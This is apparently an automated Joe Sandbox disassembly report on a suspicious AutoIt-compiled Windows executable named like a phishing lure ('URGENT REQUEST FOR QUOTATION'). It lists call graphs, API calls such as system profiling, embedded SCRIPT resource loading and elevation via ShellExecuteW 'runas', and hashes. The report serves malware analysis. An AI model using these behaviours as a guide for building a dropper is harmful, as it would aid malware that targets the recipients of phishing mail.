98101 32f21 98104 3a961 22 API calls 98101->98104 98103 72d50 98179 3a8c7 22 API calls __fread_nolock 98103->98179 98106 32f3f 98104->98106 98162 33084 22 API calls 98106->98162 98107 72d5e 98180 33084 22 API calls 98107->98180 98109 32f4b 98163 54a28 40 API calls 3 library calls 98109->98163 98112 72d6d 98181 3a8c7 22 API calls __fread_nolock 98112->98181 98113 32f59 98113->98087 98114 32f63 98113->98114 98164 54a28 40 API calls 3 library calls 98114->98164 98117 72d83 98182 33084 22 API calls 98117->98182 98118 32f6e 98118->98093 98120 32f78 98118->98120 98165 54a28 40 API calls 3 library calls 98120->98165 98121 72d90 98123 32f83 98123->98097 98124 32f8d 98123->98124 98166 54a28 40 API calls 3 library calls 98124->98166 98126 32f98 98127 32fdc 98126->98127 98167 33084 22 API calls 98126->98167 98127->98112 98128 32fe8 98127->98128 98128->98121 98170 363eb 22 API calls 98128->98170 98130 32fbf 98168 3a8c7 22 API calls __fread_nolock 98130->98168 98133 32ff8 98171 36a50 22 API calls 98133->98171 98134 32fcd 98169 33084 22 API calls 98134->98169 98137 33006 98172 370b0 23 API calls 98137->98172 98141 33021 98142 33065 98141->98142 98173 36f88 22 API calls 98141->98173 98174 370b0 23 API calls 98141->98174 98175 33084 22 API calls 98141->98175 98145 34af0 __wsopen_s 98144->98145 98146 36b57 22 API calls 98145->98146 98147 34b22 98145->98147 98146->98147 98157 34b58 98147->98157 98183 34c6d 98147->98183 98149 39cb3 22 API calls 98152 34c52 98149->98152 98150 34c5e 98150->98069 98151 39cb3 22 API calls 98151->98157 98153 3515f 22 API calls 98152->98153 98153->98150 98154 34c6d 22 API calls 98154->98157 98155 3515f 22 API calls 98155->98157 98156 34c29 98156->98149 98156->98150 98157->98151 98157->98154 98157->98155 98157->98156 98158->98083 98159->98086 98160->98091 98161->98101 98162->98109 98163->98113 98164->98118 98165->98123 98166->98126 98167->98130 98168->98134 98169->98127 98170->98133 98171->98137 98172->98141 98173->98141 98174->98141 98175->98141 98176->98093 98177->98097 98178->98103 98179->98107 98180->98112 98181->98117 98182->98121 98184 3aec9 22 API calls 98183->98184 98185 34c78 98184->98185 98185->98147 98186 33156 98189 33170 98186->98189 98190 33187 98189->98190 98191 331e9 98190->98191 98192 331eb 98190->98192 98193 3318c 98190->98193 98194 331d0 DefWindowProcW 98191->98194 98195 331f1 98192->98195 98196 72dfb 98192->98196 98197 33265 PostQuitMessage 98193->98197 98198 33199 98193->98198 98199 3316a 98194->98199 98200 331f8 98195->98200 98201 3321d SetTimer RegisterWindowMessageW 98195->98201 98245 318e2 10 API calls 98196->98245 98197->98199 98203 331a4 98198->98203 98204 72e7c 98198->98204 98205 33201 KillTimer 98200->98205 98206 72d9c 98200->98206 98201->98199 98208 33246 CreatePopupMenu 98201->98208 98209 331ae 98203->98209 98210 72e68 98203->98210 98249 9bf30 34 API calls ___scrt_fastfail 98204->98249 98241 330f2 Shell_NotifyIconW ___scrt_fastfail 98205->98241 98212 72dd7 MoveWindow 98206->98212 98213 72da1 98206->98213 98207 72e1c 98246 4e499 42 API calls 98207->98246 98208->98199 98217 72e4d 98209->98217 98218 331b9 98209->98218 98234 9c161 98210->98234 98212->98199 98220 72da7 98213->98220 98221 72dc6 SetFocus 98213->98221 98217->98194 98248 90ad7 22 API calls 98217->98248 98223 331c4 98218->98223 98224 33253 98218->98224 98219 72e8e 98219->98194 98219->98199 98220->98223 98225 72db0 98220->98225 98221->98199 98222 33214 98242 33c50 DeleteObject DestroyWindow 98222->98242 98223->98194 98247 330f2 Shell_NotifyIconW ___scrt_fastfail 98223->98247 98243 3326f 44 API calls ___scrt_fastfail 98224->98243 98244 318e2 10 API calls 98225->98244 98230 33263 98230->98199 98232 72e41 98233 33837 49 API calls 98232->98233 98233->98191 98235 9c179 ___scrt_fastfail 98234->98235 98236 9c276 98234->98236 98237 33923 24 API calls 98235->98237 98236->98199 98239 9c1a0 98237->98239 98238 9c25f KillTimer SetTimer 98238->98236 98239->98238 98240 9c251 Shell_NotifyIconW 98239->98240 98240->98238 98241->98222 98242->98199 98243->98230 98244->98199 98245->98207 98246->98223 98247->98232 98248->98191 98249->98219 98250 3105b 98255 3344d 98250->98255 98252 3106a 98286 500a3 29 API calls __onexit 98252->98286 98254 31074 98256 3345d __wsopen_s 98255->98256 98257 3a961 22 API calls 98256->98257 98258 33513 98257->98258 98259 33a5a 24 API calls 98258->98259 98260 3351c 98259->98260 98287 33357 98260->98287 98263 333c6 22 API calls 98264 33535 98263->98264 98265 3515f 22 API calls 98264->98265 98266 33544 98265->98266 98267 3a961 22 API calls 98266->98267 98268 3354d 98267->98268 98269 3a6c3 22 API calls 98268->98269 98270 33556 RegOpenKeyExW 98269->98270 98271 73176 RegQueryValueExW 98270->98271 98276 33578 98270->98276 98272 73193 98271->98272 98273 7320c RegCloseKey 98271->98273 98274 4fe0b 22 API calls 98272->98274 98273->98276 98285 7321e _wcslen 98273->98285 98275 731ac 98274->98275 98278 35722 22 API calls 98275->98278 98276->98252 98277 34c6d 22 API calls 98277->98285 98279 731b7 RegQueryValueExW 98278->98279 98280 731d4 98279->98280 98282 731ee messages 98279->98282 98281 36b57 22 API calls 98280->98281 98281->98282 98282->98273 98283 39cb3 22 API calls 98283->98285 98284 3515f 22 API calls 98284->98285 98285->98276 98285->98277 98285->98283 98285->98284 98286->98254 98288 71f50 __wsopen_s 98287->98288 98289 33364 GetFullPathNameW 98288->98289 98290 33386 98289->98290 98291 36b57 22 API calls 98290->98291 98292 333a4 98291->98292 98292->98263 98293 31098 98298 342de 98293->98298 98297 310a7 98299 3a961 22 API calls 98298->98299 98300 342f5 GetVersionExW 98299->98300 98301 36b57 22 API calls 98300->98301 98302 34342 98301->98302 98303 393b2 22 API calls 98302->98303 98313 34378 98302->98313 98304 3436c 98303->98304 98306 337a0 22 API calls 98304->98306 98305 3441b GetCurrentProcess IsWow64Process 98307 34437 98305->98307 98306->98313 98308 73824 GetSystemInfo 98307->98308 98309 3444f LoadLibraryA 98307->98309 98310 34460 GetProcAddress 98309->98310 98311 3449c GetSystemInfo 98309->98311 98310->98311 98315 34470 GetNativeSystemInfo 98310->98315 98312 34476 98311->98312 98316 3109d 98312->98316 98317 3447a FreeLibrary 98312->98317 98313->98305 98314 737df 98313->98314 98315->98312 98318 500a3 29 API calls __onexit 98316->98318 98317->98316 98318->98297 98319 3f7bf 98320 3f7d3 98319->98320 98321 3fcb6 98319->98321 98322 3fcc2 98320->98322 98324 4fddb 22 API calls 98320->98324 98323 3aceb 23 API calls 98321->98323 98325 3aceb 23 API calls 98322->98325 98323->98322 98326 3f7e5 98324->98326 98328 3fd3d 98325->98328 98326->98322 98327 3f83e 98326->98327 98326->98328 98330 41310 207 API calls 98327->98330 98345 3ed9d messages 98327->98345 98356 a1155 22 API calls 98328->98356 98351 3ec76 messages 98330->98351 98331 4fddb 22 API calls 98331->98351 98333 3fef7 98333->98345 98358 3a8c7 22 API calls __fread_nolock 98333->98358 98335 3a8c7 22 API calls 98335->98351 98336 84600 98336->98345 98357 3a8c7 22 API calls __fread_nolock 98336->98357 98337 84b0b 98360 a359c 82 API calls __wsopen_s 98337->98360 98343 3fbe3 98343->98345 98346 84bdc 98343->98346 98353 3f3ae messages 98343->98353 98344 3a961 22 API calls 98344->98351 98361 a359c 82 API calls __wsopen_s 98346->98361 98348 500a3 29 API calls pre_c_initialization 98348->98351 98349 50242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98349->98351 98350 84beb 98362 a359c 82 API calls __wsopen_s 98350->98362 98351->98331 98351->98333 98351->98335 98351->98336 98351->98337 98351->98343 98351->98344 98351->98345 98351->98348 98351->98349 98351->98350 98352 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98351->98352 98351->98353 98354 401e0 207 API calls 2 library calls 98351->98354 98355 406a0 41 API calls messages 98351->98355 98352->98351 98353->98345 98359 a359c 82 API calls __wsopen_s 98353->98359 98354->98351 98355->98351 98356->98345 98357->98345 98358->98345 98359->98345 98360->98345 98361->98350 98362->98345 98363 83f75 98374 4ceb1 98363->98374 98365 83f8b 98366 84006 98365->98366 98383 4e300 23 API calls 98365->98383 98368 3bf40 207 API calls 98366->98368 98369 84052 98368->98369 98373 84a88 98369->98373 98385 a359c 82 API calls __wsopen_s 98369->98385 98371 83fe6 98371->98369 98384 a1abf 22 API calls 98371->98384 98375 4ced2 98374->98375 98376 4cebf 98374->98376 98378 4cf05 98375->98378 98379 4ced7 98375->98379 98377 3aceb 23 API calls 98376->98377 98382 4cec9 98377->98382 98380 3aceb 23 API calls 98378->98380 98381 4fddb 22 API calls 98379->98381 98380->98382 98381->98382 98382->98365 98383->98371 98384->98366 98385->98373 98386 503fb 98387 50407 ___BuildCatchObject 98386->98387 98415 4feb1 98387->98415 98389 5040e 98390 50561 98389->98390 98393 50438 98389->98393 98442 5083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98390->98442 98392 50568 98443 54e52 28 API calls _abort 98392->98443 98404 50477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98393->98404 98426 6247d 98393->98426 98395 5056e 98444 54e04 28 API calls _abort 98395->98444 98399 50576 98400 50457 98402 504d8 98434 50959 98402->98434 98404->98402 98438 54e1a 38 API calls 3 library calls 98404->98438 98406 504de 98407 504f3 98406->98407 98439 50992 GetModuleHandleW 98407->98439 98409 504fa 98409->98392 98410 504fe 98409->98410 98411 50507 98410->98411 98440 54df5 28 API calls _abort 98410->98440 98441 50040 13 API calls 2 library calls 98411->98441 98414 5050f 98414->98400 98416 4feba 98415->98416 98445 50698 IsProcessorFeaturePresent 98416->98445 98418 4fec6 98446 52c94 10 API calls 3 library calls 98418->98446 98420 4fecb 98425 4fecf 98420->98425 98447 62317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98420->98447 98422 4fed8 98423 4fee6 98422->98423 98448 52cbd 8 API calls 3 library calls 98422->98448 98423->98389 98425->98389 98429 62494 98426->98429 98428 50451 98428->98400 98430 62421 98428->98430 98449 50a8c 98429->98449 98432 62450 98430->98432 98431 50a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 98433 62479 98431->98433 98432->98431 98433->98404 98457 52340 98434->98457 98437 5097f 98437->98406 98438->98402 98439->98409 98440->98411 98441->98414 98442->98392 98443->98395 98444->98399 98445->98418 98446->98420 98447->98422 98448->98425 98450 50a95 98449->98450 98451 50a97 IsProcessorFeaturePresent 98449->98451 98450->98428 98453 50c5d 98451->98453 98456 50c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98453->98456 98455 50d40 98455->98428 98456->98455 98458 5096c GetStartupInfoW 98457->98458 98458->98437

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 234 342de-3434d call 3a961 GetVersionExW call 36b57 239 73617-7362a 234->239 240 34353 234->240 241 7362b-7362f 239->241 242 34355-34357 240->242 243 73632-7363e 241->243 244 73631 241->244 245 73656 242->245 246 3435d-343bc call 393b2 call 337a0 242->246 243->241 247 73640-73642 243->247 244->243 250 7365d-73660 245->250 263 343c2-343c4 246->263 264 737df-737e6 246->264 247->242 249 73648-7364f 247->249 249->239 252 73651 249->252 253 73666-736a8 250->253 254 3441b-34435 GetCurrentProcess IsWow64Process 250->254 252->245 253->254 258 736ae-736b1 253->258 256 34437 254->256 257 34494-3449a 254->257 260 3443d-34449 256->260 257->260 261 736b3-736bd 258->261 262 736db-736e5 258->262 270 73824-73828 GetSystemInfo 260->270 271 3444f-3445e LoadLibraryA 260->271 272 736bf-736c5 261->272 273 736ca-736d6 261->273 266 736e7-736f3 262->266 267 736f8-73702 262->267 263->250 265 343ca-343dd 263->265 268 73806-73809 264->268 269 737e8 264->269 274 343e3-343e5 265->274 275 73726-7372f 265->275 266->254 277 73715-73721 267->277 278 73704-73710 267->278 279 737f4-737fc 268->279 280 7380b-7381a 268->280 276 737ee 269->276 281 34460-3446e GetProcAddress 271->281 282 3449c-344a6 GetSystemInfo 271->282 272->254 273->254 284 343eb-343ee 274->284 285 7374d-73762 274->285 286 73731-73737 275->286 287 7373c-73748 275->287 276->279 277->254 278->254 279->268 280->276 288 7381c-73822 280->288 281->282 289 34470-34474 GetNativeSystemInfo 281->289 283 34476-34478 282->283 294 34481-34493 283->294 295 3447a-3447b FreeLibrary 283->295 290 73791-73794 284->290 291 343f4-3440f 284->291 292 73764-7376a 285->292 293 7376f-7377b 285->293 286->254 287->254 288->279 289->283 290->254 298 7379a-737c1 290->298 296 34415 291->296 297 73780-7378c 291->297 292->254 293->254 295->294 296->254 297->254 299 737c3-737c9 298->299 300 737ce-737da 298->300 299->254 300->254
                                                                                                                      APIs
                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 0003430D
                                                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                                                      • GetCurrentProcess.KERNEL32(?,000CCB64,00000000,?,?), ref: 00034422
                                                                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00034429
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00034454
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00034466
                                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00034474
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0003447B
                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 000344A0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                      • API String ID: 3290436268-3101561225
                                                                                                                      • Opcode ID: 71f730adca2e91ac06fb98ea5d6559dce0737208af968560d234898b079c5058
                                                                                                                      • Instruction ID: 562c7bc3c51465ea5e242cbcf6fe9f8274ff7d4cb6b846dae06d5a91df09f111
                                                                                                                      • Opcode Fuzzy Hash: 71f730adca2e91ac06fb98ea5d6559dce0737208af968560d234898b079c5058
                                                                                                                      • Instruction Fuzzy Hash: 3FA1E962D0A2C4FFD726C76A7C815997FD87B26320F0884A8D0C59FE22D2BC45C4DB25

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 553 342a2-342ba CreateStreamOnHGlobal 554 342da-342dd 553->554 555 342bc-342d3 FindResourceExW 553->555 556 342d9 555->556 557 735ba-735c9 LoadResource 555->557 556->554 557->556 558 735cf-735dd SizeofResource 557->558 558->556 559 735e3-735ee LockResource 558->559 559->556 560 735f4-735fc 559->560 561 73600-73612 560->561 561->556
                                                                                                                      APIs
                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,000350AA,?,?,00000000,00000000), ref: 000342B2
                                                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000350AA,?,?,00000000,00000000), ref: 000342C9
                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,000350AA,?,?,00000000,00000000,?,?,?,?,?,?,00034F20), ref: 000735BE
                                                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,000350AA,?,?,00000000,00000000,?,?,?,?,?,?,00034F20), ref: 000735D3
                                                                                                                      • LockResource.KERNEL32(000350AA,?,?,000350AA,?,?,00000000,00000000,?,?,?,?,?,?,00034F20,?), ref: 000735E6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                      • String ID: SCRIPT
                                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                                      • Opcode ID: e65843b05452c098fc53c410784f14bfb01bbd2de4cd2ce20edb241d8ac4a254
                                                                                                                      • Instruction ID: 625e3f2b414380327432585323face6991277067d6ea4099553cec483d9908a7
                                                                                                                      • Opcode Fuzzy Hash: e65843b05452c098fc53c410784f14bfb01bbd2de4cd2ce20edb241d8ac4a254
                                                                                                                      • Instruction Fuzzy Hash: 91117C70600700BFF7228BA6DC48F277BBDEBC6B51F148169F4169A660DB75EC008A20

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00032B6B
                                                                                                                        • Part of subcall function 00033A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00101418,?,00032E7F,?,?,?,00000000), ref: 00033A78
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,000F2224), ref: 00072C10
                                                                                                                      • ShellExecuteW.SHELL32(00000000,?,?,000F2224), ref: 00072C17
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                                      • String ID: runas
                                                                                                                      • API String ID: 448630720-4000483414
                                                                                                                      • Opcode ID: ce706c953c513cea8557e4228e50484fd0f2c53598b54e403bf66d72ce3b1ffb
                                                                                                                      • Instruction ID: b3612dd68635b20a09b0c30cb29662cfe6234770ce8e18ef3c68b44ee27ee3ab
                                                                                                                      • Opcode Fuzzy Hash: ce706c953c513cea8557e4228e50484fd0f2c53598b54e403bf66d72ce3b1ffb
                                                                                                                      • Instruction Fuzzy Hash: 4011D331608345AAD71AFF60DC92DFEB7AC9B91300F44542DF286520A3CFA58A49D712
                                                                                                                      APIs
                                                                                                                      • GetInputState.USER32 ref: 0003D807
                                                                                                                      • timeGetTime.WINMM ref: 0003DA07
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0003DB28
                                                                                                                      • TranslateMessage.USER32(?), ref: 0003DB7B
                                                                                                                      • DispatchMessageW.USER32(?), ref: 0003DB89
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0003DB9F
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0003DBB1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2189390790-0
                                                                                                                      • Opcode ID: eea4fa40668f0966a10bfab25c65deeb2ab87ca984bda5230c2e90e3e938a6ea
                                                                                                                      • Instruction ID: a6669a72be199b162cb4cd41d4cbafad4c8465486da3ff5d9a48b93596a99999
                                                                                                                      • Opcode Fuzzy Hash: eea4fa40668f0966a10bfab25c65deeb2ab87ca984bda5230c2e90e3e938a6ea
                                                                                                                      • Instruction Fuzzy Hash: 34421370608341EFE73ADF24D884FAAB7E9FF46300F14455AE49687292D774E884CB82

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00032D07
                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 00032D31
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00032D42
                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00032D5F
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00032D6F
                                                                                                                      • LoadIconW.USER32(000000A9), ref: 00032D85
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00032D94
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                      • Opcode ID: 0df3783e2a1b2293c22f4158df71090d130e662a22a76c63718acfcbd84053c1
                                                                                                                      • Instruction ID: 4bf72cf3bf39901996169f965aa2a792f9927ed7d1f95d6b22e89c4d6d0f5753
                                                                                                                      • Opcode Fuzzy Hash: 0df3783e2a1b2293c22f4158df71090d130e662a22a76c63718acfcbd84053c1
                                                                                                                      • Instruction Fuzzy Hash: 6C21EFB1D01308AFEB00DFA4E889F9DBBB4FB08704F10811AF655AA6A0D7B90580CF91

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 302 7065b-7068b call 7042f 305 706a6-706b2 call 65221 302->305 306 7068d-70698 call 5f2c6 302->306 311 706b4-706c9 call 5f2c6 call 5f2d9 305->311 312 706cb-70714 call 7039a 305->312 313 7069a-706a1 call 5f2d9 306->313 311->313 322 70716-7071f 312->322 323 70781-7078a GetFileType 312->323 320 7097d-70983 313->320 327 70756-7077c GetLastError call 5f2a3 322->327 328 70721-70725 322->328 324 707d3-707d6 323->324 325 7078c-707bd GetLastError call 5f2a3 CloseHandle 323->325 331 707df-707e5 324->331 332 707d8-707dd 324->332 325->313 341 707c3-707ce call 5f2d9 325->341 327->313 328->327 333 70727-70754 call 7039a 328->333 337 707e9-70837 call 6516a 331->337 338 707e7 331->338 332->337 333->323 333->327 344 70847-7086b call 7014d 337->344 345 70839-70845 call 705ab 337->345 338->337 341->313 352 7087e-708c1 344->352 353 7086d 344->353 345->344 351 7086f-70879 call 686ae 345->351 351->320 355 708c3-708c7 352->355 356 708e2-708f0 352->356 353->351 355->356 360 708c9-708dd 355->360 357 708f6-708fa 356->357 358 7097b 356->358 357->358 361 708fc-7092f CloseHandle call 7039a 357->361 358->320 360->356 364 70963-70977 361->364 365 70931-7095d GetLastError call 5f2a3 call 65333 361->365 364->358 365->364
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0007039A: CreateFileW.KERNELBASE(00000000,00000000,?,00070704,?,?,00000000,?,00070704,00000000,0000000C), ref: 000703B7
                                                                                                                      • GetLastError.KERNEL32 ref: 0007076F
                                                                                                                      • __dosmaperr.LIBCMT ref: 00070776
                                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00070782
                                                                                                                      • GetLastError.KERNEL32 ref: 0007078C
                                                                                                                      • __dosmaperr.LIBCMT ref: 00070795
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000707B5
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000708FF
                                                                                                                      • GetLastError.KERNEL32 ref: 00070931
                                                                                                                      • __dosmaperr.LIBCMT ref: 00070938
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                      • String ID: H
                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                      • Opcode ID: 9b7b801186cf6d730534640c23318333462c1404042e55be7e6722558444fbda
                                                                                                                      • Instruction ID: fa726f59b53b6d2206048bbe8ad249dcafc65ce9e29808d9753e5efb6f17c705
                                                                                                                      • Opcode Fuzzy Hash: 9b7b801186cf6d730534640c23318333462c1404042e55be7e6722558444fbda
                                                                                                                      • Instruction Fuzzy Hash: FCA13632E14145CFDF19AF68DC51BAE3BE0AB06320F14825DF8599B392CB399D12CB95

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00033A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00101418,?,00032E7F,?,?,?,00000000), ref: 00033A78
                                                                                                                        • Part of subcall function 00033357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00033379
                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0003356A
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0007318D
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000731CE
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00073210
                                                                                                                      • _wcslen.LIBCMT ref: 00073277
                                                                                                                      • _wcslen.LIBCMT ref: 00073286
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
